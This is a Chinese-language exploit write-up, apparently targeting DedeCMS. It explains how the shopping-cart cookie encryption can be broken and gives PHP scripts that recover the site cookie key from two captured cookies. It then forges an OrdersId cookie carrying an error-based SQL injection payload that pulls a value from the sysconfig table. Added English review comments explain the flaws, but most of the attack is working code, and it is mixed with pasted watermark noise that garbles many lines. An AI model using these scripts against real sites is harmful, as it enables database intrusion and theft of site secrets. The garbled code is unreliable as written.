www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中
先看一下这个 shopcar 类是如何生成 cookie 的。
function saveCookie($key,$value)
{
    // Store a shopping-cart value in the cookie named $key. Array values are
    // first flattened by enCode() (described above as producing strings of the
    // form a=yy&b=cc), and every value is then run through enCrypt().
    // NOTE(review): enCrypt() is the only protection this cookie gets; it is
    // set with a 10-hour lifetime, path "/", and no httponly/secure flags.
    // Whatever is written here must still be treated as client-controlled when
    // it is read back, because the client can replace it at will.
    $payload = is_array($value)
        ? $this->enCrypt($this->enCode($value))
        : $this->enCrypt($value);
    setcookie($key, $payload, time() + 36000, '/');
}
简单地说,$key 就是 cookie 的 key,$value 就是 value,enCode 的作用是将 array 类型转换为 a=yy&b=cc&d=know 这样的字符串,关键是 enCrypt 函数。
function enCrypt($txt)
{
    // Cookie encoding used by saveCookie(). A 32-character key is derived from
    // md5(rand(0, 32000)); for every input byte the output carries the key
    // character itself followed by the byte XORed with that character. The
    // result is then XOR-streamed again by setKey() and base64-encoded.
    // NOTE(review): rand(0, 32000) admits at most 32001 keys and the key
    // character is emitted in clear next to every ciphertext byte, so this
    // gives neither confidentiality nor integrity; that is the weakness the
    // rest of this page walks through. It is reproduced unchanged here because
    // the matching decode routine (not shown) must mirror it byte for byte.
    srand((double)microtime() * 1000000);
    $cookieKey = md5(rand(0, 32000));
    $keyLen = strlen($cookieKey);
    $len = strlen($txt);
    $out = '';
    for ($i = 0; $i < $len; $i++) {
        // Same as the original counter that resets at strlen($cookieKey).
        $k = $cookieKey[$i % $keyLen];
        $out .= $k . ($txt[$i] ^ $k);
    }
    return base64_encode($this->setKey($out));
}
function setKey($txt)
{
    // XOR-stream $txt with the site-wide key md5(strtolower($cfg_cookie_encode)),
    // cycling through its 32 hex characters. Applying it twice restores $txt.
    // NOTE(review): enCrypt() hands this function a string that already
    // contains its per-cookie key in clear, so with a known plaintext the
    // site-wide key can be recovered from a cookie value (see the discussion
    // above). $cfg_cookie_encode therefore cannot be relied on for integrity.
    global $cfg_cookie_encode;
    $siteKey = md5(strtolower($cfg_cookie_encode));
    $keyLen = strlen($siteKey);
    $len = strlen($txt);
    $out = '';
    for ($i = 0; $i < $len; $i++) {
        // Equivalent to the original counter that wraps at strlen($siteKey).
        $out .= $txt[$i] ^ $siteKey[$i % $keyLen];
    }
    return $out;
}
enCrypt 的参数 $txt 我们是可知的,返回值就是 cookie 的值,这个我们也是可知的。
然后到了 enCrypt 调用 setKey 时的参数 $tmp,这个参数在某种意义上我们也是可知的,因为 $encrypt_key = md5(rand(0, 32000)); 只有 32000 种可能,我们可以推出 32000 种可能的 $tmp,从而推出 32000 种可能的 md5(strtolower($cfg_cookie_encode))。对了,忘记说了,我们的目的是推测出 setKey 中 $encrypt_key 的值,然后才能任意构造出购物车的 cookie。从推出的 32000 种 md5(strtolower($cfg_cookie_encode)) 中,简单过滤掉含非字母数字字符的 key,就只剩下几百个可能的 key;然后我们再重新下一次订单,再获取几百个可能的 key,取交集,得到最终的 key。
具体代码如下:
# G: e/ L* N" U<?php
// Inputs for the key-recovery proof of concept discussed above: two cookie
// values captured from two separate orders, and the plaintext each one was
// built from. Sample values from the post, left as pasted.
6 u$ N/ L4 Z2 c$ {! f$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie, change here
8 t1 J: j; O" Q" H! m$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie, change here
$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the plaintext, change here
// Helper for the proof of concept: XORs the first 32 bytes of the
// base64-decoded cookie with the first 32 bytes of $string. Because setKey()
// is a plain XOR with a 32-character key, the result is that key whenever
// $string is the intermediate value enCrypt() actually produced.
// Left as pasted (watermark noise included).
" V, X) \* h2 p Mfunction reStrCode($code,$string)" J- ?) a! N. O: _* k
{& [" r6 @2 ]$ C5 ~" P
$code = base64_decode($code);/ y* {% ^1 n2 j" M
$key = “”;
8 E3 B3 K0 T' V' hfor($i=0 ; $i<32 ; $i++)9 D7 i+ R# }6 o6 B+ h
{% V" K+ u. h% I* G) B/ \+ G# P
$key .= $string[$i] ^ $code[$i];! [7 R% P8 `: g# r. f+ h
}
" I9 q5 G9 l6 r8 S/ u4 |return $key;
. }: x9 J7 Z: B; D0 K7 O}% r+ \$ W, E$ _+ {
// Walks the md5(rand(0, 32000)) key space that enCrypt() draws its per-cookie
// key from, rebuilds the intermediate string for each candidate, and keeps
// every recovered site key that is purely alphanumeric. This is the cost of
// the weakness in enCrypt(): a rand()-derived key space small enough to be
// enumerated in one run. The application-side fix is a cryptographically
// random key and an authenticated cookie, not a wider rand() range.
// Left as pasted (watermark noise included).
function getKeys($cookie,$plantxt)
- o. W- T6 f$ J* R{: T+ w$ I8 i' y' P$ [" K, p
$tmp = $cookie;
c, ^, n3 R- l5 L8 l: Q7 j$results = array();; [: i7 I8 J/ T6 F; \
for($j=0 ; $j < 32000; $j++)' R! f# l" l1 l4 [' \
{& Z: N! m' ^( O2 r4 ~$ Z- x; _
: U; u6 z( k/ a! l" }1 ~" k$txt = $plantxt;
& V5 f8 f Y$ T$ `/ R/ r$ctr = 0;
# Z/ P7 b l. _( n% K6 D$tmp = ”;
" t% U. K1 _" o2 Q, I8 N7 X) ?$encrypt_key = md5($j);
7 ^8 Q/ U% B3 f t6 @for($i =0; $i < strlen($txt); $i ++)' h$ X# R9 I- D4 c
{
9 ]6 z6 b5 r" d L# w, v$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$ f$ k: N' s1 Z) |" A/ m2 W) B
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);1 S- v9 U# c7 y4 i- {
}2 B/ I" {6 Y* ^; w' P6 K" w M
$string = $tmp;
: l6 A8 C0 y7 T2 ^: R$code = $cookie;
3 ?8 n) Z4 d+ B+ m% V; c$result = reStrCode($code,$string);
" c, v. B6 x! dif(eregi(‘^[a-z0-9]+$’,$result))
1 ?+ v2 L2 O2 G$ E# N; {{( K0 r. Q8 S7 t* S& Y7 @+ I
echo $result.”\n”;$ S D6 ^, l+ j' n! f* J# z* p
$results[] = $result;
* V8 g1 b4 z2 e- h- {; D R}
' r- P* ^' \0 x6 W( ~4 T}2 L- {' @% K) Z: K' c @5 ~
return $results;" |- [5 Y7 ^" f" `) d$ a& T8 [
}% |. z4 m2 L! ?2 A3 Q9 j3 P; Q
// Candidate keys that survive for both captured cookies are printed as the
// recovered site key. Left as pasted (watermark noise included).
$results1 = getKeys($cookie1,$plantxt);/ ^) o( |! [3 W& p7 k8 x) ]# q7 N
$results2 = getKeys($cookie2,$plantxt);
5 O: c2 v* r# C, @/ ]4 L0 U2 Lprint “\n——————–real key————————–\n”;
/ I" y d! H% H1 Xforeach($results1 as $test1)6 k+ O$ }9 [' O3 V; r$ D
{: q+ \3 u8 s4 B6 N
foreach($results2 as $test2)
4 [* f/ C, J& ?; O- O4 d ^& p7 U4 u{$ H# y% ]0 I# p4 r* {
if($test1 == $test2)# ]( H% x: b+ @' v
{! a) ~$ M; H6 S3 Z9 J& k, j( E
echo $test1.”\n”;
" Z1 M! [+ U. A; d4 t* a8 }8 a}2 q, y+ V& H" \) I
}
9 P4 T+ {9 Y" s}& `3 v6 {- z `( \. R e; d
?>
cookie1 和 cookie2 是我下了两次订单后分别生成的 cookie,
plantxt 可以根据页面自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出 md5(strtolower($cfg_cookie_encode))。
得到这个 key 之后,我们就可以构造任意购物车的 cookie。
接着看
/ W5 M7 K# |- ~ u20 class MemberShops
! E; l2 t* c( y( h. ?1 M% w& A21 {
! ^( q+ e! M2 l: K6 O. z+ E7 P$ G1 i, F22 var $OrdersId;/ q& A" k$ u" z$ I$ m5 e
23 var $productsId;( m5 B }$ E5 g& k1 v- F
243 v0 i/ g- {: k9 W' X j
function __construct()
{
    // Resume the visitor's order from the "OrdersId" cookie, or start a new
    // one through MakeOrders() when no usable value is present.
    // NOTE(review): getCookie() presumably decodes the client-supplied cookie;
    // once the cookie key is recoverable (see enCrypt() above) that value is
    // attacker-controlled, and the carbuyaction.php excerpt below interpolates
    // it straight into SQL. Validate it against the expected order-id format
    // here, or parameterise the query that consumes it.
    $fromCookie = $this->getCookie("OrdersId");
    $this->OrdersId = $fromCookie;
    if (empty($fromCookie)) {
        $this->OrdersId = $this->MakeOrders();
    }
}
发现 OrdersId 是从 cookie 里面获取的,
然后
/plus/carbuyaction.php 中的
// The cart's OrdersId comes from the client cookie (see MemberShops::__construct above).
! y& A$ g& J. F7 J29 $cart = new MemberShops();% r3 R' F2 N" f* }8 a9 @- ~) v8 X
39 $OrdersId = $cart->OrdersId; // the order id recorded for this request
……
// NOTE(review): $OrdersId is concatenated into the query as-is. With the
// cookie key recoverable (see enCrypt() above) this is an SQL injection sink;
// the value should be checked against the expected order-id format, or the
// query parameterised, before it reaches GetOne().
9 I+ E' M8 B5 k/ E6 p173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
接着我们就可以注入了。
通过下面的代码生成 cookie:
<?php, n! J4 j. c. I% _/ Q
// Payload and recovered key used to build a forged OrdersId cookie. $txt is
// the injection string shown in the post, reproduced as pasted; it is only
// reachable because carbuyaction.php interpolates the cookie-derived OrdersId
// into SQL unescaped (see the excerpt above). $encrypt_key is the site key
// recovered by the previous script (sample value from the post).
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;7 B& _6 z+ K5 m" @6 z/ G2 v
$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here
// Copy of shopcar.class.php setKey(): XOR-stream $txt with a 32-character key,
// here read from the script-level $encrypt_key instead of
// md5(strtolower($cfg_cookie_encode)). Left as pasted (watermark noise included).
# S3 j' x0 k' z; r9 `8 q, cfunction setKey($txt)/ w" j6 a! S6 A! A, q
{ h4 X! G7 I ^+ I* i
global $encrypt_key;) b# N3 x- X9 P4 C, o. m! h7 `
$ctr = 0;
4 T6 f5 n" N2 o$tmp = ”;
$ J3 `( D# _2 @/ Y. y/ Efor($i = 0; $i < strlen($txt); $i++)
0 S0 D# y, D4 S( Q{( Y0 t( j5 Z0 V4 i" B/ y- F
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
, e# H Z% a a- I$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];; ^# x' a1 M/ w/ T- a- L
}
9 R( S V/ u* treturn $tmp;9 g3 c; G: K: X: m/ e
}& I) g. g! r. T# q+ `: @
// Copy of shopcar.class.php enCrypt(), calling the script-level setKey() above.
// The same weakness applies: a rand()-derived key whose characters are emitted
// in clear next to each XORed byte. Left as pasted (watermark noise included).
function enCrypt($txt)& R1 C$ G+ I. u/ k* q, ^) \
{
5 E/ b/ A' s1 n& O8 Xsrand((double)microtime() * 1000000);
. M1 k! o0 N$ E5 N$encrypt_key = md5(rand(0, 32000));( Z' H1 D2 D+ F
$ctr = 0;( n) W* U7 R8 J& _* y; {
$tmp = ”;
% _3 |/ g2 L0 y) \! p# lfor($i = 0; $i < strlen($txt); $i++)
" L) o# J6 O& j v4 X" N7 ~{
' M I- U3 s3 N- @2 ?: g: y$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$ o1 H1 y+ ]# ]# Z" d
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
* `! b7 Q/ v6 {9 ^; U}$ J+ \; H# I0 c! H
return base64_encode(setKey($tmp));* U; z" _9 Q ^( a
}4 p; H* G4 D6 c4 N. }. C% R
// Re-runs enCrypt() until strpos($dest, '+') is falsy, then prints the
// resulting cookie value. Left as pasted (watermark noise included).
for($dest =0;$dest = enCrypt($txt);)
8 e# _2 m3 G, N. k9 ?{" j* v/ M1 Z& ?: e9 E
if(!strpos($dest,’+'))
6 D9 g% O9 C1 a# ]9 ^{
4 Z; P7 D6 U8 A- [break;
- n& l& x3 v O k" Y}" r& E! E' N* t" O0 ]: ?* Y
}, i/ E' E m) y+ j+ P1 }
echo $dest.”\n”;
5 p6 e. [, f7 O) n9 x, I?>
9 a: |) M2 P! v* ^' U
9 s4 A4 y7 r( e3 K6 B |